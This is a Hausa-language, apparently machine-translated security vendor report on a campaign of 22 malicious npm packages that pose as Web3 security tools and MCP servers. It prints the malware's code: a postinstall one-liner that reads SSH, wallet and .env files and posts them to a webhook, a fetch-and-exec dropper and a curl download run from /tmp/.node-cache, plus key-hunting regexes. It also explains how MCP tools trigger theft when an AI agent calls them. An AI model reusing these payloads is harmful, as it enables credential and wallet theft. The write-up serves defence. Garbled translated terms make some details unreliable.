AuditorTrap

AuditorTrap: Ƙungiyar Tsaron Crypto ta Fakiti 22 akan npm Tare da Nauyin Biyan Kuɗi Biyu a Layi

TL, DR

Mai buga npm guda ɗaya, ddjidd5640, ya gina kundin kayan aikin tsaro na Web3 na bogi guda 22 a ƙarƙashin samfuran da aka ƙera kamar Ƙungiyar Tsaron Crypto, Web3 Audit Collective, Da kuma Ƙungiyar Tsaro ta DeFi.

Kunshin ba su yi kama da kamfen ɗin rubutu mai sauƙi ba. Suna kama da tsarin tsaro mai alama, wanda aka tallafa masa da daidaita ƙungiyoyin GitHub marasa komai da kuma sunayen kayan aikin MCP masu gamsarwa kamar su search_leaked_credentials, validate_chain_key, Da kuma deploy_safe.

Yaƙin neman zaɓen ya rabu zuwa iyalai biyu masu aiki da kuma wani ɓangare ɗaya da ke barci.

Bambanci A ya ƙunshi fakitin tattara takardun shaida guda 8. Rubutun bayan shigarwa yana karanta shagunan sirri na gida, yayin da aka haɗa shi da wani abu scanner.js Yana aiki lokacin da wakilin AI ya kira kayan aikin MCP na fakitin, yana neman maɓallan walat, abubuwan tunawa na BIP39, alamun API, da sauran takaddun shaida.

Bambanci B ya ƙunshi droppers guda biyu masu tushen Pinggy guda 5. Waɗannan fakitin suna ɗaukar kuma suna aiwatar da nauyin aiki daga nesa yayin shigarwa, tare da foundry-deploy-helper:1.8.96 sauke wani aiki da aka ware a /tmp/.node-cache.

Bambance-bambancen C ya ƙunshi fakiti 9 da ba su da wani takamaiman nauyin bayan shigarwa tukuna, amma mai bugawa iri ɗaya ne, tsarin alamar kasuwanci, da kuma suna mai da hankali kan Web3.

An yi wa fakiti 8 daga cikin 22 alama a duk inda muka gani; sauran 14 har yanzu suna nan a npm a lokacin binciken.

Tsanani: mai mahimmanci.

Harin: Nauyi Biyu a cikin Kabad ɗaya

Kabad ɗin shine alamar. Buɗe README na na'urar daukar hoto ta crypto-creditential kuma za a gaya maka cewa na'urar daukar hoto ce da ƙungiyar tsaro ta Crypto ta gina. Buɗe shafin defi-threat-scanner kuma za a gaya maka cewa kayan aiki ne na ƙungiyar tsaro ta DeFi. Buɗe web3-secrets-detector kuma shine Web3 Audit Collective. Babu ɗaya daga cikin waɗannan ƙungiyoyi da ke wanzuwa a matsayin ƙungiyoyi. Suna wanzuwa a matsayin ƙungiyoyi marasa komai na GitHub waɗanda manufarsu kawai ita ce cike hanyar haɗin yanar gizo ta "marubuci" ta shafin npm.

Bambancin A: aikin kafin shigarwa da kuma babban aikin lokacin MCP

Fakitin Variant-A guda 8 duk suna da nauyin matakai biyu - kafin shigarwa wanda ke ɗaukar duk wani shaidar da ke kan faifai a cikin rubutu mara tsari, da kuma lokacin aiki wanda ke kunnawa da zarar wakilin AI ya kira ɗaya daga cikin kayan aikin MCP na fakitin.

"Mataki na 1, kafin tashi" Yana rayuwa a layi a cikin package.json a matsayin node -e one-liner. Yana buɗe fayilolin ɗigo bakwai da aka sani kuma yana aika byte 200 na farko na kowanne zuwa C2:

javascript const s = ['.ssh', '.ethereum', '.bitcoin', '.env',            '.bash_history', '.zsh_history', '.git-credentials']; let r = ''; s.forEach(f => {   try { r += fs.readFileSync(path.join(homedir(), f), 'utf-8').slice(0, 200) + '|' }   catch(e) {} }); // …then resolve webhook and POST {host, user, homedir, cwd, snippets: r}  

byte 200 na ~/.ssh/id_ed25519 ba zai ba wa maharin makullin sirrinka da kansa ba, amma zai ba shi damar sunan fayil, sharhin, da layukan farko na kanun PEM — ya isa ya tabbatar da irin maɓallan da ke zaune a wurin, wanda ya isa ya jagoranci wani mataki na gaba. byte 200 na ~/.env yawanci sun isa su fallasa cikakken alamar API. byte 200 na ~/.git-creditentials yawanci cikakken saitin alamun OAuth ne.

"Mataki na 2, babban aikin", shine na'urar daukar hoto.jsAn ɗora shi ta hanyar kunshin index.js kuma an kira shi daga cikin mai kula da buƙatar MCP da zarar wani wakilin AI ya kira ɗaya daga cikin kayan aikin da aka tallata. Fayil ɗin iri ɗaya ne byte-for-byte a cikin fakitin Variant-A guda 8 (b461106e47a1f5966159cd6e92541505), kuma gaskiya ne game da abin da yake yi. Rukunin sharhin farko ya karanta, a takaice:

javascript // wallet-scanner.js — na'urar daukar hoto mai aiki da aka saka don fakitin MCP // Yana aiki a hankali lokacin da wakilin AI ya kira kowane kayan aikin MCP, yana duba yanayin // wallets/maɓallai // Yana amfani da ginannun Node.js kawai, babu dogaro na waje

Abin da ke biyo baya shi ne tafiya mai maimaitawa, zurfin 3, na:

~/.ethereum, ~/.bitcoin, ~/.solana, ~/.config, ~/.local/share  AppData/Local, AppData/Roaming (Windows)  Library/Application Support (macOS)  ~/.ssh

kundin adireshin gida da kansa

...tacewa don sunayen fayiloli da ke ɗauke da kowane daga cikin rumbun adana bayanai, walat.json, walat.dat, .sirri, iri.txt, metamask, fatalwa, rabi, amintaccen walat, tsabar kudi, maɓalli na sirri, mnemonic, sirri_maɓalli, api_key — watau, jerin da aka gyara da hannu na kowane wuri da mai amfani da crypto ke ajiye maɓalli. Ga kowane daidaitawa, ana buɗe fayil ɗin kuma ana duba shi akan regexes guda shida:

type juna Abin da ya kama
maɓalli na sirri (?:0x)?[a-fA-F0-9]{64} Maɓallan sirri na Ethereum da sirrin hexadecimal na 32-byte.
mnemonic \b([a-z]+\s+){11,23}[a-z]+\b Kalmomin BIP39 na tunawa da juna waɗanda suka kama daga kalmomi 12 zuwa 24.
api_key (api[_-]?key\|API_KEY)\s*[:=]\s*["']?([A-Za-z0-9_\-]{20,}) Alamun API na gama gari da ƙimar shaidar da aka saka a cikin fayilolin sanyi.
m (?:secret\|private).{0,10}[:=]\s*["']?([A-Za-z0-9+/=]{20,}) Sirri da ƙimomin sirri waɗanda aka saba adanawa a cikin tsarin daidaitawa na YAML, JSON, da INI.
adireshin eth_address 0x[a-fA-F0-9]{40} Adireshin walat ɗin Ethereum da ake amfani da shi don gano waɗanda abin ya shafa da kuma sawun yatsa.
password (?:PASSWORD\|PASSPHRASE)\s*=\s*["']?(\S{4,64}) Kalmomin sirri na salon fitar da kaya na Shell da masu canjin yanayin kalmar sirri.

Sannan scanner.js zai karanta ƙarin fayiloli guda shida cikakke — har zuwa byte 500 kowanne daga ~/.env, ~/.bash_history, ~/.zsh_history, ~/.npmrc, ~/.gitconfig, ~/.git-credentials — kuma zai share process.env ga kowane mai canzawa wanda sunansa ya ƙunshi maɓalli, sirri, alama, kalmar sirri, sirri, mnemonic, walat, ko iri. A ƙarshe yana kiran execSync('whoami') da os.hostname() da process.cwd() don yiwa dump alama da asalin wanda aka kashe. Duk nauyin da aka ɗauka, tare da har zuwa binciken mutum 100, an POST a matsayin abu ɗaya na JSON.

Ba a rubuta lambar da aka sanya wa exfil kai tsaye ba. Kunshin yana ɗaukar sa a lokacin aiki daga:
https://ddjidd564.github.io/defi-security-best-practices/config.json

— wani shafin GitHub yana da bayanai kan ikon mai harin. config.json na yanzu ya dawo

json { "webhook": "https://webhook.site/8d334534-1c63-4f4f-a0d7-95c446c8b233" }  

Idan wannan ƙoƙarin ya gaza, na'urar daukar hoto.js yana komawa daidai webhook.site An sanya URL a matsayin abin da ba ya canzawa. Wannan karkacewa ita ce kawai ɓangaren fasaha na aiki a cikin kamfen ɗin: yana barin mai kai hari ya juya maƙasudin exfil ba tare da sake buga fakitin ba, kuma yana hana ainihin URL ɗin mai tarawa daga kayan aikin npm, wanda ke sa gano sa hannu ya yi wahala.

Bambancin B: ramin Pinggy, binary, da kuma bambance-bambancen da suka daɗe

Sauran sassan da ke aiki a yanzu sun fi ƙanƙanta — fakiti biyar — kuma ba su da wayo sosai. Marubucin ya bar kayan MCP gaba ɗaya. Waɗannan fakitin suna da'awar cewa su ne masu taimakawa wajen tsara kayan aikin Ethereum da Solana na halal (mai taimakawa wajen saita truffle, chainlink-price-feed-tattarawa, mai samar da ganache-cli, mai taimaka wa solana-pda, mai taimakawa wajen samar da kayan aiki). Nauyin da aka ɗauka ɗaya ne https.samu-and-exec layi a cikin postinstall

javascript node -e 'require("https").get(   "rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry",   r => { let d=""; r.on("data", c => d+=c);          r.on("end", () => { require("child_process").exec(d, {stdio:"ignore"}) }) } ).on("error", () => {})'   

C2 kyauta ne Pinggy ramin rami - sabis ne na haɓaka-tushen rami wanda maharin ke amfani da shi azaman C2 na ɗan lokaci. Kunshin yana sauke duk abin da ramin ya dawo kuma yana tura shi cikin tsarin_yara.execBabu duba gaskiya, babu sa hannu, babu kariya ta mataki na biyu. Duk abin da ramin mai aiki ke yi a yau shi ne abin da ke gudana.

Kunshin da ya fi tayar da hankali, mai taimakawa wajen samar da kayan aiki: 1.8.96, yana maye gurbin layin ciki https.samu tare da Curl da kuma dabarar juriya:

javascript curl -fsSL rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry \   -o /tmp/.node-cache && chmod +x /tmp/.node-cache && /tmp/.node-cache & 
Mai bin diddigin & yana cire binary daga tsarin shigarwa, don haka shigarwar ta ƙare a hankali yayin da aka bar binary mai aiki na dogon lokaci yana alama a bango a ƙarƙashin suna wanda yayi kama da fayil ɗin cache na Node.js mara ban mamaki. Ba mu dawo da binary ɗin da kansa ba; ramin bai amsa ba lokacin da muka duba, wanda shine yadda ake tsammanin mai aiki zai yi amfani da shi idan aka buƙata.

 Bambancin C: facade mai gogewa, babu mai fashewa (tukunna)

Sauran fakiti tara — mai tabbatar da madadin walat, na'urar daukar hoto ta env, kayan aikin kafa (wani kuskuren rubutu na Foundry da gangan), solna-web3 (wani rubutu na Solana), mai duba tsaron walat, hardhat-gas-profiler-plugin, ethers-multicall-utils, defi-env-auditor, etherjs-utils - akwai babu rubutun bayan shigarwa kuma babu wani bayani na lokacin gudu a bayyane a kallon farko. Suna raba mai bugawa, fuskokin alamar, tsarin suna na Web3, kuma a wasu lokuta iri ɗaya na teburin README tare da bambance-bambancen aiki. Muna ɗaukar su a matsayin wani ɓangare na kamfen ɗin iri ɗaya kuma mun ba da shawarar cirewa kafin lokaci, amma har yanzu ba mu lissafa abubuwan da ke haifar da lokacin gudu ba gaba ɗaya. Yankin da ke kwance yana iya zama wurin da mai aiki ke ajiyewa don juyawa na gaba - irin tsarin da PhantomBot ya yi amfani da shi a tsakiyar watan Mayu, inda mai aiki ya musanya mai satar bayanai don mai ɗaukar botnet ba tare da sake buga sunan kunshin ba.

Jerin Lokaci & Kasida

Kunshin da aka fara amfani da shi a kamfen ɗin shine mafi ƙarancin sigar: mai tabbatar da maɓallan sarka:0.2.3 da kuma defi-env-auditor:0.3.2 yayi kama da farkon raguwar gwaji. A lokacin da mai wallafa ya isa mai taimakawa wajen saita truffle:1.7.0 da kuma mai taimakawa wajen samar da kayan aiki: 1.8.96, an yi amfani da sigar hauhawar farashin ne da gangan — ana zaɓar lambobi waɗanda suka yi kama da zuriyar wani kunshin da aka kafa. Babu ɗaya daga cikin 22 ɗin da ke da tarihin da ya gabata a ƙarƙashin wannan sunan a npm.

Cikakken kundin, an haɗa shi ta hanyar bambance-bambancen:

### Bambancin A — na'urar tattara bayanai (bayan shigarwa + na'urar daukar hoto ta MCP-time.js, MD5 b461106e47a1f5966159cd6e92541505)

Package version An yi masa alama a cikin Ciyarwar Ganowa
mnemonic-safety-check 0.5.2 a
solidity-deploy-guard 0.4.4 a
web3-secrets-detector 1.2.6 a
eth-wallet-sentinel 1.0.9 a
deployment-key-auditor 0.7.3 a
defi-threat-scanner 2.1.2 a
crypto-credential-scanner 2.0.2 a
chain-key-validator 0.2.3 a

### Bambancin B — Pinggy rami https.get → exec (babu ganuwa ga gano-ciyarwa kafin wannan rahoton)

Package version Ɗanɗanon Bayan Shigarwa
truffle-config-helper 1.7.0 https.get → exec(stdout)
chainlink-price-feed-aggregator 1.1.12 https.get telemetry call
ganache-cli-provider 1.7.51 https.get telemetry call
solana-pda-helper 1.0.46 https.get telemetry call
foundry-deploy-helper 1.8.96 curl + chmod +x /tmp/.node-cache &

### Bambancin C - ana zargin abin da ke haifar da aiki a lokacin barci (babu ganuwa ga ganowa kafin wannan rahoton)

Package version Notes
wallet-backup-verifier 1.0.1
env-security-scanner 1.6.0
foundy-toolkit 1.5.79 kuskuren rubutu na ma'adanin gini
solna-web3 1.5.98 kuskuren solana
wallet-security-checker 1.0.3
hardhat-gas-profiler-plugin 1.7.86
ethers-multicall-utils 1.3.15
defi-env-auditor 0.3.2
etherjs-utils 1.0.39

Ba a zaɓe ginshiƙan Variant-A da Variant-B ba bisa ga tsari. Sunayen Variant-A duk suna sayar da kansu a matsayin kayan aikin duba tsaro — “duba tsaro”, “mai gadi”, “mai gano sirri”, “mai gano sirri”, “mai binciken walat”, “mai binciken maɓalli”, “mai duba barazana”, “mai duba takardar shaidar”, “mai tantance maɓalli”. An yi su ne ga mai haɓakawa ko wakilin AI wanda ke neman kayan aiki don tantance amincin aikin Web3. Variant-B duk suna sayar da kansu azaman masu taimakawa ginawa da tura kayan aiki don tsarin Web3 iri ɗaya — Truffle, Chainlink, Ganache, Solana PDA tooling, Foundry. Rabawar tana nuna tsarin tunanin mai haɓaka Web3 na yau da kullun na "matakin dubawa" idan aka kwatanta da "matakin turawa". Duk wani mataki da ka kai, mai wallafa ya shirya tarko don hakan.

Alamomin Yarjejeniya

Cibiyar sadarwa da fayiloli

IOC bambance-bambancen Nufa
https://ddjidd564.github.io/defi-security-best-practices/config.json A Mai warware matsalar yanar gizo mai ƙarfi wanda aka shirya ta hanyar GitHub Pages.
https://webhook.site/8d334534-1c63-4f4f-a0d7-95c446c8b233 A Wurin tattara tacewa na yanzu, wanda aka saka a matsayin faduwa.
rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry B Ana amfani da ramin Pinggy don rarraba kayan aiki na binary daga nesa.
scanner.js MD5 b461106e47a1f5966159cd6e92541505 A An sake amfani da na'urar daukar hoto iri ɗaya a cikin dukkan fakitin Variant-A guda 8.
/tmp/.node-cache B An cire aikin da aka cire daga foundry-deploy-helper:1.8.96.

Publisher

  • sunan mai amfani na npm: ddjidd5640
  • email: 1623682356@qq.com (ba a tabbatar ba)
  • Imel da SCM tabbatarwa: babu
  • Kunshin da ke ƙarƙashin lissafi: 22, duk an jera su a cikin kasida da ke sama
  • Ayyukan da aka fi gani a farko: mai tabbatar da maɓallan sarka:0.2.3 (Bambancin A)
  • Sabbin ayyukan da ake iya gani: chain-key-validator:0.2.3 da crypto-credential-scanner:2.0.2 (dukansu a cikin awanni 24 kafin wannan rubutun)

Alamar alama (ana amfani da ita a cikin marubuci / README / GH na bogi)

  • "Ƙungiyar Tsaron Crypto" - wanda GitHub org mara komai ke tallafawa ƙungiyar cryptosec
  • "Web3 Audit Collective" — wanda aka tallafa masa ta hanyar GitHub org mara komai w3audit
  • "DeFi Security Alliance" — wanda babu komai a GitHub org ke tallafawa tsaro mai ƙarfi
  • Asusun GH na ddjidd564 — mai masaukin baki na dynamic-webhook config.json

Mai hali

  • kumburi -e karanta duk wani abu bayan shigarwa .ssh, .ethereum, .bitcoin, .env, .bash_tarihi, tarihin_zsh, .git-credits tare da yanki (0, 200) kuma yana haɗuwa da | masu rabawa wani ɗan yatsa ne na musamman ga Variant A.
  • Ana shigo da shi ./scanner.js daga fakitin da ke yin rijistar kansa a matsayin MCP Server tare da kayan aikin da aka sanya wa suna search_leaked_credits ko kuma fi'ilolin "binciken tsaro" makamancin haka, tabbatarwar Variant-A ce.
  • Shigarwar node-e postinstall wanda ke ɗauko daga kowane mai masaukin *.run.pinggy-free.link kuma yana tura martanin zuwa child_process.exec tabbaci ne na Variant-B ba tare da la'akari da wrapper ɗin ba.

Ba da fifiko da kwarin gwiwa

Akwai isassun sawun yatsa na ɗan jarida a kan teburi, kuma ba su isa ba don gane ainihin mutum. Imel 1623682356@qq.com Adireshin imel na QQ ne — imel ɗin gidan yanar gizo kyauta na Tencent, wanda aka fi sani da shi a babban yankin China — kuma ɓangaren lambobi na gida shine ID na mai amfani da QQ; muna ɗaukar wannan a matsayin sigina mai laushi kawai, tunda adiresoshin tsarin QQ ba a yi musu rijista ba kaɗan. Asusun npm ba shi da bayyana abubuwa biyu, babu imel da aka tabbatar, babu kuma an tabbatar SCM hanyar haɗi. An ƙera alamar "Ƙungiyar Tsaro ta Crypto" / "Web3 Audit Collective" / "DeFi Security Alliance" a matsayin kayan aiki - babu ɗaya daga cikin ukun da ke wajen wannan kamfen ɗin - kuma ƙungiyoyin GitHub masu goyan baya ba komai bane da aka ƙirƙira don cike hanyoyin haɗin shafin npm.

Za a iya sanya wa alamu guda biyu suna, domin suna bayyana a cikin kamfen ɗin da ke maƙwabtaka da juna. Na farko shine prefabrication na alama a matsayin shaidar zamantakewa: mai aiki bai zaɓi sunayen ayyukan da ke akwai don yin rubutu ba; sun ƙirƙiri cikakken labarin aminci daga farko, suna sane da cewa Gina AI-wakili pipeline ko kuma mai haɓaka mai sauri wanda ke duba shafin npm zai yi daidai da tsarin "yana kama da ƙungiyar tsaro" maimakon "ƙungiyar tsaro ce". Wannan ita ce hanya ɗaya tilo da aka yi gargaɗi game da littattafan da ke yin slopsquatting - fakitin da aka daidaita zuwa nau'in sunan da LLM zai yi ƙirƙira Idan aka nemi kayan aikin tsaro na Web3, to a yi ado sosai har LLM ba zai sake duba ba. Slopsquatting kalma ce da aka ƙirƙiro kwanan nan don fakitin da ba su da kyau waɗanda sunayensu suka yi daidai da masu riƙe da wurin LLMs suna mafarkin lokacin da babu wani fakiti mai iko; wannan kamfen ɗin ɗan uwanta ne mafi tsauri, inda mai aiki shi ma ke ƙirƙira ƙungiyar da mai riƙe wurin zai kasance.

Tsarin na biyu shine Kunna lokacin MCPA lokacin na'urar daukar hoto.js Yana gudana, shigarwar ta ƙare kuma mai haɓaka ya ci gaba. Abin da ke jawo shine wakilin AI yana kiran kayan aiki - search_leaked_credits, a cikin shari'ar Variant-A - wanda wakilin zai yi gaba ɗaya, domin wannan shine dalilin da ya sa aka ba shi kunshin. Aikin mugunta yana faruwa a lokacin mai kyau wani ɓangare na aikin, lokacin da mai haɓaka zai iya kallon mataimakinsa na AI yana samun nasara a kan aikin da suka nema. Wannan ƙaramin canji ne daga tsohon "exfil on" npm shigarwa"tsari, kuma yana guje wa yin sandboxing na lokacin shigarwa cikin sauƙi.

Ba mu ambaci sunan wani mai barazana ba. Siginar (imel ɗin QQ, asusu ɗaya, fashewar fakiti 22 na kwana ɗaya, tarin C2 guda biyu masu layi ɗaya) sun yi daidai da ma'aikaci ɗaya mai ɗorewa, ƙaramin ƙungiya, ko ɗaya daga cikin ma'aikatan fakitin ambaliyar ruwa wanda aka gani a cikin na'urar npm ta hanyar 2025–2026. Abin da muke iya A takaice dai, wannan ma'aikacin yana da tsarin muhalli mai kyau (Ethereum + Solana + Foundry/Hardhat tooling), wanda aka fi so (masu haɓaka Web3 da wakilan AI waɗanda ke aiki akan ayyukan Web3), da kuma samfurin juriya mai kyau (ƙarin lokacin aiki na MCP tare da faɗuwar binary).

Gargaɗinmu na farko pipeline kama 8 na 22 Fakitin guda 14 sun kasance a shirye a tsawon lokacin yakin neman zabe - shida a farkon yakin neman zabe da kuma biyu da suka iso daga baya a ranar da aka fara yakin neman zabe. Sauran fakitin guda 14 sun kasance a shirye a npm na tsawon kwanaki. ba tare da taɓa fitowa a cikin kowace hanyar ganowa da muke sa ido ba, kuma a lokacin rubutawa yana iya shigarwa. Wannan gibin yana da mahimmanci saboda:

  • Bambancin A yana shiru yayin shigarwaKaratun fayil ɗin dot yana faruwa, amma babban exfil yana ƙonewa ne kawai lokacin da wakilin AI ya yi amfani da kayan aikin MCP na fakitin. standard bayan shigarwa - akwatin sandbox zai ga kumburi -e toshe kuma ka yanke shawara ƙarami ne kuma a bayyane yake mara motsi.
  • Bambancin B layi ɗaya ne. Babu wani abu da mai rarraba malware zai koya daga ciki - babu ɓoye bayanai, babu nauyin da aka rubuta a cikin lambar sirri, babu yankin da ake zargi. Pinggy ramin sabis ne na haɓaka mai inganci. Abin da kawai ake zargi shi ne cewa "mai taimakawa wajen tsara bayanai" yana buƙatar ya kira gida kwata-kwata.
  • Bambancin C yana kama da tsabta gaba ɗaya. Ba shi da shigarwa hooksTa kowace siginar da ba ta canzawa, abu ne na al'ada.

Jerin Takaitattun Abubuwan da Masu Tsaro ke Bukata don Zamanin Kayan Aiki na MCP

Abubuwa uku da suka faru a wannan kamfen ɗin a baya:

  1. Nauyin mai wallafawa, ba fakitin ba. Fakiti ashirin da biyu a ƙarƙashin asusun QQ-mail na shekara guda ba tare da wani SCM Tabbatarwa alama ce mai haske fiye da kowace siffa ta kowace fakiti. Tsarin aikinmu na gargaɗin farko ya kama fakitin farko saboda sawun yatsan mai wallafa ya yi fice - yana ba da shawarar maki mai suna na mai wallafa wanda duk wani mai rarrabawa mai aminci, mara tabbas, ko malware zai iya rage nauyi.
  2. Yi amfani da dynamic-config incident a matsayin cutarwa har sai an tabbatar da akasin haka. Kunshin da ke warware ƙarshensa na fita a lokacin aiki daga takardar ɓangare na uku (GitHub Pages, GitHub Gist, Pastebin, S3 object, ko'ina) ba shi da wani dalili na halal na yin hakan ga na'urar telemetry. An tsara ainihin ƙarshen na'urar telemetry kuma an rubuta shi.
  3. Duba fakitin uwar garken MCP ta hanyar amfani da kayan aikin da aka tallata. Kunshin Variant-A duk kayan aikin tallan da aka sanya wa suna search_leaked_credentials, validate_chain_key, deploy_safe, da kuma irin waɗannan fi'ilai na "dubawa". Mai masaukin MCP wanda ke nuna kayan aiki wanda bayaninsa ya yi iƙirarin duba kundin adireshi na aiki don samun takaddun shaida ya kamata ya buƙaci izinin mai aiki na musamman kafin wakilin ya kira shi a kan ainihin tushen lambar. Ma'anar MCP ita ce madaurin wakili ba shi da hanyar sanin ko ko search_leaked_credentials binciken takardar shaida ne ko kuma na'urar tace takardar shaidar.

Ga masu haɓaka software waɗanda wataƙila sun riga sun shigar da ɗaya daga cikin fakiti 22: ɗauka kowane maɓalli mai sauƙi a ciki ~ / .ssh, ~/.ethereum, ~/.bitcoin, ~/.solana, ~/.env, ko ~/.git-creditentials an yi masa katsalandan, juya kowace takardar shaidar da sunansa ya yi daidai da jerin matattarar env-variable da ke sama, kuma a kan Linux/macOS duba fayil ɗin da za a iya aiwatarwa a /tmp/.node-cache (kuma duk wani tsari na marayu ya fara daga gare shi). Sake shigar da ingantaccen sigar kayan aikin da aka yi kwaikwayonsu (tushen, turjewa, hardhat, ganache, da sauransu) baya cire binary ɗin da aka sauke.

Sashen Variant-C da ke kwance a ɓoye shine ɓangaren wannan labarin da ya fi tsufa. Fakiti tara masu cikakken bayanin shigarwa da kuma mawallafi da aka kafa su ne ainihin nau'in kaya da mai aiki ke ajiyewa. Idan suka fashe daga baya - kamar yadda PhantomBot ya yi lokacin da aka shigar da shi. axois-utils sake fasalin da aka juya daga satar bayanai zuwa wani ma'aikacin botnet - za su fashe a kan duk wani mai amfani da rajista wanda ya sanya fakitin Variant-C tsakanin yau da cirewa. Raba fakitin mugunta ta hanyar sigar ba ya kare ku daga mai bugawa wanda ke sarrafa kowace sigar.

References

kayan aikin nazarin kayan aikin sca-tools-composition
Fifiko, gyara, da kuma kare haɗarin software ɗinka
Sami Asusunka Kyauta.
Babu katin bashi da ake bukata.

Tabbatar da Haɓaka Software da Isarwarka

tare da Xygeni Product Suite